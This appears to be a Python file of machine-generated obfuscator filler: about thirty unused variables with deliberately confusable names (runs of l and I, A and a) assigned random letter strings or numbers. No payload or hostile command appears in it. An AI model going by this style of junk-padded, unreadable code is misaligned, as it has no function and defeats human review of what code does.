ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt = "RjqQzadHcTXDKGUbExbDdoCPNpRUoyiDECPONjTdVSFqmWUAxXycqnqwDjjweanNwphzowmlJZFtFpx"
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX = 145
gXlKlbttaOqioCJDfDDpDiCcxFLcgXGRWzowPebmTISSLZbQAaMQPVkDcFIqGIcLAPJYSvRaLlTuFDI107 = "WXbdkooulSwwlIJxCNIWUDYfgoYzhaBcxVQMtYvLDDUopByVZWVTPMuxETjWiqhaxhbJcRJOjehLlAt"
lIllIIIIIIlllIllIllllllllIIlIlIllIIlIIIIIlllllIlIlIlIIllllIlIllIIIIIIIlIIlllIlIlIllllIlIIIIlIllllllIlIlIlIIlI = 289
IIllIIIIIlllIlIlIlllllIlIIIIIlIIllIIIllIllllIIIIIIIllIlllIIIIIlIIIIIIIIIlIIlIIIlIllIlIIlIllIlllllIlIIllIIIIIlIl = 233
AaAaAAAaaAAAaAAaaAAaaAaAaaaaaAaaaAAaAAaaaaaaaAAaAaaaAaaAAaaaAaaAAaaAaAaAaaAAAaAaaAaaaaAAaAAAAaaaAaAaAaaaaaAaAAaAA = 47
n115 = "bZtPlxiFOsknbqvgaQAmTJfAMCZUyGmACUTKntTlzBQiZQemYXJAqLpBDvUABmyJCgHETUtAbEJkXga"
IIlllIIIlllllIIIIllIllllllllllIllIIIIlllIlllIlIlIlIllIIlIllIlIllllllIIlllllIIIlIIlIIllIIlllIlIlllIIlIllllIIIIIlIlllIl = 276
ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc = 785
lllIllIIlIIlllIllIIIIlIIIllIIlIIlIllIIIIlIlllIlIllIlIlllIIlIllllllIIIlIIllIlIIIIlIIIIIIIllIIlllIIlIIIIllIIlIIIlIllIlIlllI = 308
AaAaAAaAaaaAAAaaaAAaAaAAaAaAAAaAAAAaaaAaAaAAaAaaaaaAaaAaaAAaAaAAaAAAAAAAaAAaaAaaAaaAaAaaAAaAAAAaAAAaAAAaAAAaaAAaAaAAaaaaAaa = "CSwClXajfZcCFnJZKKKfQAYIZxIMiHXIZBdrXjElGFBZrcChPpXCDgdaiRwWzxVTswbUZMifiBOUYHv"
V125 = "KzpHfybBgYMejCLDJZkodYIDfSpoTrieeBlstkOvtrpQBFqcCunOjauBKjyVcjnpbbRKwcmACBcLiAw"
j127 = "gYsKRLdRsGrpuObHQhDDblNQGhAVTstTLIsWxFAmbDPHWmvFqMnpBFdYhzbiuTJqUsTNhHuzMUMJdXL"
llIlIlIlIIIlIIIIIIIlIllIlIllIlIlIIlIIIIIIIlIlIIIlIIIlIIllIIIIIlIlIIIIlIlIIlIllIlIIllIIlIIlIlIIIIlIlllIIIIlllIIIIIIIIIIIIlIIlIIlIl = 746
aaAaaAAAaAaAaAAAAaAAaaAaAaaaAaAAAAAAAAAaAAAaAaAaAAAAaAaaaaaaAAaAaaaAAAAAaAAAaAAaAAAAaaAAaAaAAaAAAAAaAAaAAAaaAaaAAaAAAaAAaaAaaaaAaaa = 233
lIIllIIllIIIIIllllllIllIIlllIlIIIllIlIIIlIIIllIIIIllllIlIlIIllIlllIlIlIlllIlIlllllIIIIIIIIlllIIIIIIllIlIIllIlIlIIIIIIIIIIlIIIIlIllIlI = 338
y135 = "rdHSAqNkYThOAfAdImcvQgkwJgLKldtEcJeTaYakxvBcybqkjgIBJxMdCSChaRTWVhVcnoteptdbhux"
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU = "JqmcbSUdJusBWjyCyrgBPuITethrLNlFPDfAVfuXUAoJQCVohcXAfNQABkAPALBEjpGYfcZUFZtRwhB"
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS = 257
o16805275645285652141 = "GTxfyWbeBTbTDGKWkkEzXPelQpvbmUFkbrfbOBivBRLeJuKTnfuWFDywjgcUscMruhkWsnZMdXpYWRF"
yPWdJWFfaVmzldeAJcrtFHMfRPIzVHrnsytibAuIpCancAmgFJlGNdYmqbfNKMJNtrNAsIiGqgERaDS143 = 336
f16805275645286655145 = 445
M147 = "NfXVRzYgOxEjUBgpSkCNrxMJrCwInhhmqHBLkuFqgJaVpWNbBQgHulQIRuTdhYijEVAZTTaYGTyOQos"
llIlllllIlIIIIllIIlllIIIlllIlllllIllIIIIIIllllllIIlIllIIllIIlllIllIlIIlIllIIllIIlIlIIIIIlIIllIllIIIIIIIlIIlIIIIllIlIIlllIllllllllIIIlIlIlllIlIllIllIl = 576
IlllIIlIIIlIIlllIIlIlIlIlIlllllIIllIIIIIIllIlllIlIIIIlIllIlIIIIlIllIIIIllllIIlllIIlIlllllIlIIIlIlIIlIIllIIllIlllIlIIllllllIIlIlllllIlIIlllIllllIIIlIlIl = "DoSfkkxfiWNqVNGNZqMqQQBSgKJqciJBAHmPoIwThyGVqIyojOkucXMChWrPaGSkEazzzvjuLHZEDvE"
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk = "bgPuEHojqBCNLizwczphZsEtKSNwhtaOXWqUtKmVAMowgsrHSOXwuZsFNIgYVSVWOQqoYyDFCJqdswh"